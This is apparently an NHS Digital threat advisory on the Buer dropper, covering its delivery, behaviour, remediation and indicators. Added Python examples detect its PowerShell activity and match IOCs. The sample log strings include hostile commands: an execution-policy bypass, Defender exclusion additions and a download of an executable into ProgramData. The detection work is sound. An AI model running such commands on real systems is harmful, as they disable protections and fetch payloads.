
Buer Dropper

Buer is a modular MaaS downloader trojan sold on hacking forums. Advertised by its creators as a cheaper alternative to more established loaders such as Emotet, it has seen a massive increase in usage in the wake of Trickbot's takedown.




Affected platforms

The following platforms are known to be affected:

Threat details

Introduction

First observed in August 2019, Buer (AKA BuerLoader) is a modular malware-as-a-service (MaaS) dropper that competes with other downloader trojans such as Emotet and Bazar.

The loader itself is written in C, with its control panel built on ASP.NET Core MVC. It is sold through several dark web forums for less than £300.


Delivery

As with most MaaS offerings, affiliate users are responsible for delivering Buer. However, at the time of publication, only one distribution chain has been observed. This chain bears many similarities to that used by Bazar: a preliminary loader is delivered via Google Docs links within highly tailored spear-phishing emails sent through a legitimate commercial email service. When a user follows one of these links, the loader calls out to a delivery URL to download an EXE file disguised as a Microsoft Office document. It then performs several checks to determine the affected system's location, terminating itself if it detects a CIS country, before unpacking the embedded EXE containing Buer. This is loaded directly into the affected system's memory rather than written to disk.


Activities

Once installed, Buer executes two separate sets of PowerShell commands: one to bypass PowerShell's script execution policy, and another to add entries to the Windows Defender exclusion list. If successful, it then connects to a command and control server via HTTPS POST and GET requests to retrieve payloads, which are dropped with dynamically generated names under C:\ProgramData. Payloads dropped by Buer include the Cobalt Strike and Empire post-exploitation toolsets and Ryuk ransomware.
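The two PowerShell command sets and the ProgramData drop location described above are observable in PowerShell script block logging (Event ID 4104). The following is an added detection example, not code from NHS Digital or from the Buer malware: it runs three rules over a constructed set of script block records and escalates when both of Buer's command sets are seen. The record layout, the sample commands and the specific exclusion path are assumptions made for illustration.

```python
import re
from dataclasses import dataclass


@dataclass
class Finding:
    record_id: int
    rule: str
    detail: str


# Constructed sample script block texts (Event ID 4104 style); not real telemetry.
SAMPLE_EVENTS = [
    {"id": 1, "script": "Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process -Force"},
    {"id": 2, "script": "Add-MpPreference -ExclusionPath 'C:\\ProgramData\\kx8f2q'"},
    {"id": 3, "script": "Get-ChildItem C:\\Users\\alice\\Documents"},
    {"id": 4, "script": "Invoke-WebRequest https://example.invalid/u -OutFile C:\\ProgramData\\a1b2c3\\svc.exe"},
    {"id": 5, "script": "Add-MpPreference -ExclusionExtension '.exe'"},
]

# Rule 1: execution policy weakened to Bypass/Unrestricted (Buer's first command set).
EXEC_POLICY_BYPASS = re.compile(r"set-executionpolicy\b.*\b(bypass|unrestricted)\b", re.I)
# Rule 2: any Defender exclusion added by path, process or extension (second command set).
DEFENDER_EXCLUSION = re.compile(r"add-mppreference\b.*-exclusion(path|process|extension)\b", re.I)
# Rule 3: an executable referenced under C:\ProgramData, the drop location used for payloads.
PROGRAMDATA_EXE = re.compile(r"[A-Z]:\\ProgramData\\[^\s'\"]*\.(exe|dll)\b", re.I)


def evaluate(events):
    """Return one Finding per rule match; a record can trigger more than one rule."""
    findings = []
    for ev in events:
        script = ev["script"]
        if EXEC_POLICY_BYPASS.search(script):
            findings.append(Finding(ev["id"], "execution_policy_bypass", script))
        if DEFENDER_EXCLUSION.search(script):
            findings.append(Finding(ev["id"], "defender_exclusion_added", script))
        m = PROGRAMDATA_EXE.search(script)
        if m:
            findings.append(Finding(ev["id"], "executable_under_programdata", m.group(0)))
    return findings


def triage(findings):
    """Escalate only when both of Buer's command sets appear on the same host.

    Either rule alone is noisy (administrators legitimately add exclusions and
    change execution policy); the combination is the loader's fingerprint.
    """
    rules = {f.rule for f in findings}
    return "execution_policy_bypass" in rules and "defender_exclusion_added" in rules


if __name__ == "__main__":
    found = evaluate(SAMPLE_EVENTS)
    for f in found:
        print(f"record {f.record_id}: {f.rule}: {f.detail}")
    print("escalate:", triage(found))
```

On a live estate the same regexes can be applied to the ScriptBlockText field of 4104 events exported from the Microsoft-Windows-PowerShell/Operational log; the exclusion rule should be paired with a review of Get-MpPreference output, since an exclusion that was added successfully persists after the script block has been logged.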


Threat updates

Date Update
6 May 2021 New variant written in Rust

A new variant of Buer, known as RustyBuer, has been rewritten in the Rust programming language and is being delivered via phishing emails posing as DHL support notifications. Rewriting the loader in a different language may be intended to evade signatures and detections built for the original C variant.


Remediation advice

To prevent and detect an infection, NHS Digital advises that:

  • Secure configurations are applied to all devices.
  • Security updates are applied at the earliest opportunity.
  • Tamper protection settings in security products are enabled where available.
  • Obsolete platforms are segregated from the rest of the network.
  • IT usage policies are reinforced by regular training to ensure all users know not to open unsolicited links or attachments.
  • Multi-factor authentication (MFA) and lockout policies are used where practicable, especially for administrative accounts.
  • Administrative accounts are only used for necessary purposes.
  • Remote administration services use strongly encrypted protocols and only accept connections from authorised users or locations.
  • Systems are continuously monitored, and unusual activity is investigated, so that a compromise of the network can be detected as early as possible.

Please note that NCSC maintains guidance for securely configuring a wide range of end user device (EUD) platforms. For further details refer to their end user device security guidance pages.


Indicators of compromise

Network indicators

IP addresses

  • 04.248.83[.]13

Host indicators

SHA256 hashes

  • 10943b90969722bf359e4b039d2953e02072e03e0a7f1bdb1dea09d9197288b1
  • 32616f41a71fc7a4286736a6fc77da2a555dbc8301a8bd5fbdbab231955a42c5
  • 5b607f001ba62e042344d30b65cad2774df2deb50e0b92c33da85e9338c123c4
  • 6c7f43434e5db8703c0a47dedeeab976159d8704bfbe2e4ff65405f38d508e9d
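The indicators above are published in defanged form and need to be normalised and validated before they are loaded into a blocklist or matched against telemetry. The following is an added example, not part of the advisory: it refangs the list as printed, classifies each entry as a SHA256 hash or an IPv4 address, rejects anything that is neither, and then matches the result against a few constructed proxy and EDR log lines. Note that the IP address as printed has a leading-zero first octet, so a strict dotted-quad check rejects it; it should be verified against the original vendor report before use. The log line format and hostnames are assumptions made for illustration.

```python
import re

# Indicators exactly as printed in the advisory above (defanged with [.]).
RAW_IOCS = """
04.248.83[.]13
10943b90969722bf359e4b039d2953e02072e03e0a7f1bdb1dea09d9197288b1
32616f41a71fc7a4286736a6fc77da2a555dbc8301a8bd5fbdbab231955a42c5
5b607f001ba62e042344d30b65cad2774df2deb50e0b92c33da85e9338c123c4
6c7f43434e5db8703c0a47dedeeab976159d8704bfbe2e4ff65405f38d508e9d
"""

SHA256_RE = re.compile(r"^[0-9a-f]{64}$")


def refang(value):
    """Undo the common defanging conventions used in published IOC lists."""
    return value.replace("[.]", ".").replace("hxxp", "http")


def is_valid_ipv4(value):
    """Strict dotted-quad check: four decimal octets, 0-255, no leading zeros."""
    parts = value.split(".")
    if len(parts) != 4:
        return False
    for p in parts:
        if not p.isdigit() or (len(p) > 1 and p[0] == "0") or int(p) > 255:
            return False
    return True


def load_iocs(text):
    """Return ({'ip': set, 'sha256': set}, [rejected raw lines])."""
    iocs = {"ip": set(), "sha256": set()}
    rejected = []
    for line in text.splitlines():
        raw = line.strip()
        value = refang(raw.lower())
        if not value:
            continue
        if SHA256_RE.match(value):
            iocs["sha256"].add(value)
        elif is_valid_ipv4(value):
            iocs["ip"].add(value)
        else:
            rejected.append(raw)
    return iocs, rejected


# Constructed telemetry (not real logs): a proxy line and two EDR file-hash lines.
SAMPLE_TELEMETRY = [
    "2021-05-06T10:01:02Z proxy host=ws01 dst=198.51.100.7 method=POST uri=/ status=200",
    "2021-05-06T10:01:05Z edr host=ws01 path=C:\\ProgramData\\kx8f2q\\svc.exe "
    "sha256=6C7F43434E5DB8703C0A47DEDEEAB976159D8704BFBE2E4FF65405F38D508E9D",
    "2021-05-06T10:02:00Z edr host=ws02 path=C:\\Windows\\notepad.exe sha256=" + "0" * 64,
]

KV_RE = re.compile(r"\b(dst|sha256)=(\S+)")


def match_telemetry(lines, iocs):
    """Return (field, value, line) for every log field that hits a loaded indicator."""
    hits = []
    for line in lines:
        for key, val in KV_RE.findall(line):
            val = val.lower()  # hashes are case-insensitive; EDR exports vary
            if key == "dst" and val in iocs["ip"]:
                hits.append((key, val, line))
            elif key == "sha256" and val in iocs["sha256"]:
                hits.append((key, val, line))
    return hits


if __name__ == "__main__":
    loaded, bad = load_iocs(RAW_IOCS)
    print("loaded:", {k: len(v) for k, v in loaded.items()}, "rejected:", bad)
    for field, value, line in match_telemetry(SAMPLE_TELEMETRY, loaded):
        print(f"HIT {field}={value}: {line}")
```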

Last edited: 6 May 2021 12:17 pm